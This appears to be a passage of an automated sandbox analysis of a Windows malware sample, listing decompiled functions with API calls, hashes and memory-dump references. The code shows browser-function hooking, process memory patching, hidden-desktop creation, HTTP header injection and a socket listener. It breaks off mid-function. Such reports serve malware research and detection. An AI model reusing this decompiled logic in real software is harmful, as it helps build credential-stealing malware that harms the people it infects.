WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,00404CE3,?,00000000,?,?,00404F4D), ref: 0040B78F
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,00404CE3,?,00000000,?,?,00404F4D,00422020,00000000,00412A76), ref: 0040B7B7
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,v*A,v*A,?,?,00404CE3,?,00000000,?,?,00404F4D,00422020,00000000,00412A76), ref: 0040B7CF

Strings

B, xrefs: 0040B76D, 0040B77F, 0040B74C
v*A, xrefs: 0040B6E1, 0040B7C1, 0040B7C5, 0040B6E4, 0040B7C4

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID: B$v*A
API String ID: 390532180-1725069656
Opcode ID: b0ba6ac3e975a08e1d1da889f11fcee4f3bd4a750b6ca4dfcf6660638269c2b1
Instruction ID: 259e99843ddda2d71a16a13db45966a43395f92bd68d4a3c124ed256cea5f2d2
Opcode Fuzzy Hash: b0ba6ac3e975a08e1d1da889f11fcee4f3bd4a750b6ca4dfcf6660638269c2b1
Instruction Fuzzy Hash: 73318072900209AADF109FB8CC84EDE7B69EB49770F108726F935B71D0D774DA408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414818, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414818(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x423e5c =  *0x423e5c & 0x00000000;
				 *0x423e60 =  *0x423e60 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x423e40);
				 *0x423e58 = _a4;
				 *0x423e34 = _a8;
				 *0x423e64 = _a12;
				 *0x423e38 = _t14;
				 *0x423964 = _a16;
				 *0x42385c = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x423e3c = GetProcAddress( *0x423e38, "PR_SetError");
				_t12 = GetProcAddress( *0x423e38, "PR_GetError");
				 *0x4237f4 = _t12;
				return _t12;
			}

0x00414818
0x0041481f
0x0041482c
0x0041482e
0x00414838
0x00414841
0x0041484f
0x00414858
0x00414865
0x00414877
0x00414889
0x0041488e
0x00414890
0x00414896

APIs

InitializeCriticalSection.KERNEL32(00423E40,74B04EE0,00404FBD,00422360), ref: 0041482E
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041486A
GetProcAddress.KERNEL32(PR_SetError), ref: 0041487C
GetProcAddress.KERNEL32(PR_GetError), ref: 0041488E

Strings

PR_SetError, xrefs: 0041486C
PR_GetNameForIdentity, xrefs: 0041484A
PR_GetError, xrefs: 0041487E

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 7172d9af390fc3bc83bcbf2735f272b0854a5d130ae1bc2071b2762776021cc0
Instruction ID: 0a6281f6c03bb19aeb96810d34207816c7c6052225c900204128a62ca049c41a
Opcode Fuzzy Hash: 7172d9af390fc3bc83bcbf2735f272b0854a5d130ae1bc2071b2762776021cc0
Instruction Fuzzy Hash: 6601FBB5B01350AFC720CF68EC44A16BFF0F749762B42443AB458A3260D3BC9949CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0041CEA9, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041CEA9(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E00407504( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E00409F0E(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E0040A280(_t109, _t63);
					E0040A23E(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E0040D51D(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E00412E8D(0x2937498d,  &_v1028, 0);
						_t63 = E0040EF1F(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E0040D5CF(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E0040D83A( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E00405B00(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E0040C70A( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E00406F38( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E0040874C( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x40da49;
								_v1124 = 0x40da4c;
								_v1120 = E0040DA4F;
								_v1116 = E0040DA73;
								_v1112 = E0040DABA;
								_v1108 = E0040DAEF;
								_v1104 = 0x40da49;
								E004117CB(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E00406DC3(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E0040A081(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E00409ECD( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E0040A228(E0040A228(_t63, _v1156), _v1152);
						E00406E85(_t105);
						return 0;
					} else {
						E0040A280(_t108, _t63);
						goto L4;
					}
				}
			}

0x0041cea9
0x0041ceb6
0x0041ceb9
0x0041cebc
0x0041cebd
0x0041cec1
0x0041cec5
0x0041cecb
0x0041cf11
0x0041cf18
0x0041cf1d
0x0041cf22
0x0041cf27
0x0041cf2b
0x0041cf2d
0x00000000
0x00000000
0x0041cf34
0x0041cf3d
0x0041cf45
0x0041cf46
0x0041cf48
0x0041cf4e
0x0041cf56
0x00000000
0x00000000
0x0041cf5c
0x0041cf62
0x0041cf95
0x0041cfab
0x0041cfb8
0x0041cfbd
0x0041cfbf
0x00000000
0x00000000
0x0041cfce
0x0041cfd3
0x0041cfd5
0x0041d101
0x0041d10a
0x00000000
0x0041cfdb
0x0041cfdb
0x0041cfe1
0x0041cfe3
0x0041cfe8
0x0041cfed
0x0041cffc
0x0041d001
0x0041d00e
0x0041d014
0x0041d016
0x0041d023
0x0041d028
0x0041d02a
0x0041d02e
0x0041d036
0x0041d042
0x0041d05a
0x0041d05e
0x0041d063
0x0041d065
0x0041d070
0x0041d080
0x0041d086
0x0041d088
0x0041d088
0x0041d065
0x0041d02a
0x0041d016
0x0041d095
0x0041d09b
0x0041d0a0
0x0041d0b7
0x0041d0c4
0x0041d0cc
0x0041d0d4
0x0041d0dc
0x0041d0e4
0x0041d0ec
0x0041d0f4
0x0041d0fc
0x0041d0fc
0x00000000
0x0041d0a0
0x0041cf64
0x0041cf67
0x0041cf82
0x0041cf69
0x0041cf69
0x0041cf71
0x0041cf76
0x0041cf76
0x00000000
0x0041cf67
0x0041ced2
0x0041ced8
0x0041ced9
0x0041cee2
0x0041ceed
0x0041cef2
0x0041cefa
0x0041ceff
0x0041cf05
0x0041d10f
0x0041d11c
0x0041d122
0x0041d12f
0x0041cf0b
0x0041cf0c
0x00000000
0x0041cf0c
0x0041cf05

APIs

Part of subcall function 00409ECD: socket.WS2_32(?,00000001,00000006), ref: 00409ED6
Part of subcall function 00409ECD: connect.WS2_32(00000000,?,-0000001D), ref: 00409EF6
Part of subcall function 00409ECD: closesocket.WS2_32(00000000), ref: 00409F01

Part of subcall function 0040A280: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040A296

GetCurrentThread.KERNEL32 ref: 0041CF8E
SetThreadPriority.KERNEL32(00000000), ref: 0041CF95

Part of subcall function 0040EF1F: OpenWindowStationW.USER32 ref: 0040EF44
Part of subcall function 0040EF1F: CreateWindowStationW.USER32 ref: 0040EF57
Part of subcall function 0040EF1F: GetProcessWindowStation.USER32 ref: 0040EF68
Part of subcall function 0040EF1F: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040EFA3
Part of subcall function 0040EF1F: CreateDesktopW.USER32 ref: 0040EFB7
Part of subcall function 0040EF1F: GetCurrentThreadId.KERNEL32 ref: 0040EFC3
Part of subcall function 0040EF1F: GetThreadDesktop.USER32(00000000), ref: 0040EFCA
Part of subcall function 0040EF1F: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040EFDC
Part of subcall function 0040EF1F: CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040EFEE
Part of subcall function 0040EF1F: CloseWindowStation.USER32(?,?), ref: 0040F009

Part of subcall function 0040D5CF: TlsAlloc.KERNEL32(004231B8,00000000,0000018C,00000000,00000000), ref: 0040D5E8

GetShellWindow.USER32 ref: 0041CFDB
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041D00E

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0041D070
CloseHandle.KERNEL32(?), ref: 0041D080
CloseHandle.KERNEL32(?), ref: 0041D086
SystemParametersInfoW.USER32 ref: 0041D095

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
String ID:
API String ID: 1240616959-0
Opcode ID: 692a3017eb5ce1e0ae6bfb2206e6afe613af19aa717b6ad6d7113cee2dcdd83d
Instruction ID: 9a1f0ba031929b326a70928446fe498a59ca2dbabef75c4ecff5c1fa2ab16b34
Opcode Fuzzy Hash: 692a3017eb5ce1e0ae6bfb2206e6afe613af19aa717b6ad6d7113cee2dcdd83d
Instruction Fuzzy Hash: D1619071508341AFC720EFA5CC45A9FBBE8AFC5714F00492EF594A72A1C778D849CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C91F, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C91F(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				if(E0041C804( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E0041BB4F( &_v76);
					return _v120;
				}
				_t85 = E0041B221( &_v76);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x424004;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E0041BE86(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E00406E85( *((intOrPtr*)(_t148 +  *0x42401c + 8)));
							 *((intOrPtr*)(_t148 +  *0x42401c + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E0041BEAC(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E00405ACA(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E00405ACA(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E00405ACA(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x424004;
						EnterCriticalSection(0x424004);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E0041BBB9(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E00408B12(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E0041BE86(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t142 = _t107 * 0x24;
							E0041BBB9( *((intOrPtr*)( *0x42401c + _t142 + 0x10)),  *((intOrPtr*)( *0x42401c + _t142 + 0xc)));
							E00406E85( *(_t142 +  *0x42401c + 0x14));
							 *(_t142 +  *0x42401c + 0x14) =  *(_t142 +  *0x42401c + 0x14) & 0x00000000;
							 *(_t142 +  *0x42401c + 0x1c) =  *(_t142 +  *0x42401c + 0x1c) & 0x00000000;
							 *(_t142 +  *0x42401c + 0x18) =  *(_t142 +  *0x42401c + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t142 +  *0x42401c + 0xc)) = _v76;
							 *((intOrPtr*)(_t142 +  *0x42401c + 0x10)) = _v72;
							 *((intOrPtr*)(_t142 +  *0x42401c + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E0041BEAC(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E0041BE14(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x0041c92b
0x0041c948
0x0041cb30
0x0041cb34
0x0041cb43
0x0041cb43
0x0041c951
0x0041c959
0x0041c95f
0x0041c976
0x0041c978
0x0041cacb
0x0041cad0
0x0041cad0
0x0041cad5
0x00000000
0x00000000
0x0041cade
0x0041cae8
0x0041caea
0x0041caf0
0x0041caf3
0x0041caf8
0x0041cafb
0x0041cb08
0x0041cb0f
0x0041cb0f
0x0041cb16
0x0041cb25
0x0041cb29
0x0041cb2a
0x00000000
0x0041cb2a
0x0041cafe
0x0041cb03
0x0041cb06
0x00000000
0x00000000
0x00000000
0x0041cb06
0x0041c97e
0x0041c983
0x0041c987
0x0041c98b
0x0041c9b3
0x0041c9b5
0x0041c9b9
0x0041c9ba
0x0041c9d2
0x0041c9d6
0x0041c9da
0x0041c9db
0x0041c9ee
0x0041c9f2
0x0041c9f6
0x0041c9f7
0x0041ca05
0x0041ca07
0x0041ca07
0x0041ca0d
0x0041ca13
0x0041ca18
0x0041caa2
0x0041caad
0x0041cab2
0x0041cab7
0x0041cabd
0x0041cabd
0x0041cac2
0x0041cac3
0x00000000
0x0041cac3
0x0041ca1e
0x0041ca21
0x0041ca26
0x0041ca29
0x0041ca36
0x0041ca3d
0x0041ca48
0x0041ca56
0x0041ca60
0x0041ca6a
0x0041ca74
0x0041ca82
0x0041ca8f
0x0041ca9c
0x00000000
0x0041ca9c
0x0041ca2c
0x0041ca31
0x0041ca34
0x00000000
0x00000000
0x00000000
0x0041ca34
0x0041c98d
0x0041c991
0x0041c994
0x00000000
0x00000000
0x0041c99a
0x0041c99f
0x0041c9a3
0x0041c9a5
0x0041c9ad
0x0041c9a7
0x0041c9a7
0x0041c9a7
0x00000000
0x0041c961
0x0041c966
0x0041c96c
0x00000000
0x0041c96c

APIs

Part of subcall function 0041B221: EnterCriticalSection.KERNEL32(00423FE0,-00423E5C,00000000,00423E40), ref: 0041B23C
Part of subcall function 0041B221: LeaveCriticalSection.KERNEL32(00423FE0), ref: 0041B2BF

SetLastError.KERNEL32(00002F78,?), ref: 0041C966
EnterCriticalSection.KERNEL32(00424004), ref: 0041CA0D
LeaveCriticalSection.KERNEL32(00424004,?), ref: 0041CAC3
EnterCriticalSection.KERNEL32(00424004,?), ref: 0041CAEA
LeaveCriticalSection.KERNEL32(00424004,?), ref: 0041CB2A

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: a346f28ea6ee941a8a98353e704cdd0750cf4b3ec809ef0d69a36aca0cd0af30
Instruction ID: e1a25540b1431eee08dc08b3dc18da052c28e0a1db9459969d57a469f85a459d
Opcode Fuzzy Hash: a346f28ea6ee941a8a98353e704cdd0750cf4b3ec809ef0d69a36aca0cd0af30
Instruction Fuzzy Hash: 2B519130208344DFC721DF29DC85AAA7BA4FF84368F14462AF954972B1C734EC91DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004141C3, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004141C3(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E00412EC8(__ecx, __eflags, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E00412FEE();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E0040A658(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E004124FF(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0041406E( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E004125BA( &_v124);
							_v78 = _t94;
							E00412612( &_v128);
						}
						_v144 =  *0x423e2c;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E0040A228(_t59, _v156);
							E0040A228(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E0040A280(_t87, _t97);
											_t69 = E004088BA(0x20000, E004140F6, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E0040A228(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x423e2c, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E0041406E( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x004141c9
0x004141d4
0x004141db
0x004141e2
0x004141e8
0x004141f2
0x004141f7
0x004141f9
0x00414391
0x00414395
0x0041439a
0x0041439a
0x0041439c
0x004143a2
0x004143a2
0x00414204
0x00414209
0x0041421b
0x0041421e
0x00414221
0x0041425e
0x0041425e
0x00414263
0x0041426a
0x00414274
0x00414279
0x00414279
0x00414283
0x00414287
0x0041428b
0x00414293
0x00414295
0x00414297
0x0041429b
0x0041429b
0x0041429f
0x004142a3
0x004142a5
0x004142a7
0x004142ab
0x004142ab
0x004142ab
0x004142af
0x004142af
0x004142bf
0x004142c5
0x004142c7
0x0041436d
0x00414371
0x00414386
0x0041438f
0x00000000
0x004142cd
0x004142cd
0x004142d3
0x004142d3
0x004142d7
0x00000000
0x00000000
0x004142dd
0x004142e1
0x004142e5
0x004142ed
0x004142f1
0x00414345
0x00414345
0x0041434b
0x0041434d
0x0041434f
0x00414352
0x00000000
0x00000000
0x00414300
0x0041431c
0x00414320
0x00414327
0x00414337
0x0041433c
0x0041433e
0x00414340
0x00414340
0x0041433e
0x0041435f
0x00414365
0x00414367
0x00000000
0x00000000
0x00000000
0x00414367
0x004142f3
0x004142f7
0x004142f7
0x00000000
0x004142f7
0x004142e7
0x00000000
0x004142e7
0x00000000
0x004142d3
0x00000000
0x00000000
0x00000000
0x00414223
0x00414223
0x0041422e
0x00414234
0x00414239
0x00000000
0x00000000
0x0041423b
0x0041424d
0x00414250
0x00414253
0x00000000
0x00000000
0x00000000
0x00414253
0x00414255
0x00414258
0x00000000
0x00000000
0x00000000
0x00414258
0x004141ec
0x00000000

APIs

Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0041422E
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 004142BF
accept.WS2_32(?,00000000,00000000), ref: 0041434B
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0041435F
CloseHandle.KERNEL32(?), ref: 00414380
CloseHandle.KERNEL32(?), ref: 0041438F

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 28ddd3194b4cc48f97d93dd0e2f6fc0781d01b251f61b6a1a6abeade50b7805c
Instruction ID: 0ee328ee0d924732d6edb2fbba1cd09f98464ba88ea2f2edfb3d4f156d3bbdd1
Opcode Fuzzy Hash: 28ddd3194b4cc48f97d93dd0e2f6fc0781d01b251f61b6a1a6abeade50b7805c
Instruction Fuzzy Hash: DD516D31508214ABC720EF65DD44D9FB7E9EBC4754F200A2EF991E32A0D734DD858B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00405F8D, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F8D() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v588;
				void* _v596;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v596;
						_v596 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v588;
						if(_t65 <= _t71 || _t65 ==  *0x423bd8) {
							L20:
							_t45 = Process32NextW(_v20,  &_v596);
							continue;
						} else {
							_t47 = 0;
							if(_v12 <= _t71) {
								L8:
								_t48 = E00412E11(_t65, _t70, _t65);
								_v28 = _t48;
								if(_t48 != _t71) {
									_t73 = OpenProcess(0x400, _t71, _v588);
									if(_t73 != _t71) {
										_t72 = E0040849C(_t65, _t73,  &_v32);
										CloseHandle(_t73);
										if(_t72 != 0) {
											if(_v32 ==  *0x423978 && GetLengthSid( *_t72) ==  *0x423970 && E00406EF6( *((intOrPtr*)( *0x42396c)),  *_t72, _t56) == 0 && E00406E10(4 + _v12 * 4,  &_v16) != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
												if(E00405F04(_v16, _v588, _v28) != 0) {
													_v5 = 1;
												}
											}
											E00406E85(_t72);
										}
										_t71 = 0;
									}
									CloseHandle(_v28);
								}
								goto L20;
							} else {
								goto L6;
							}
							while(1) {
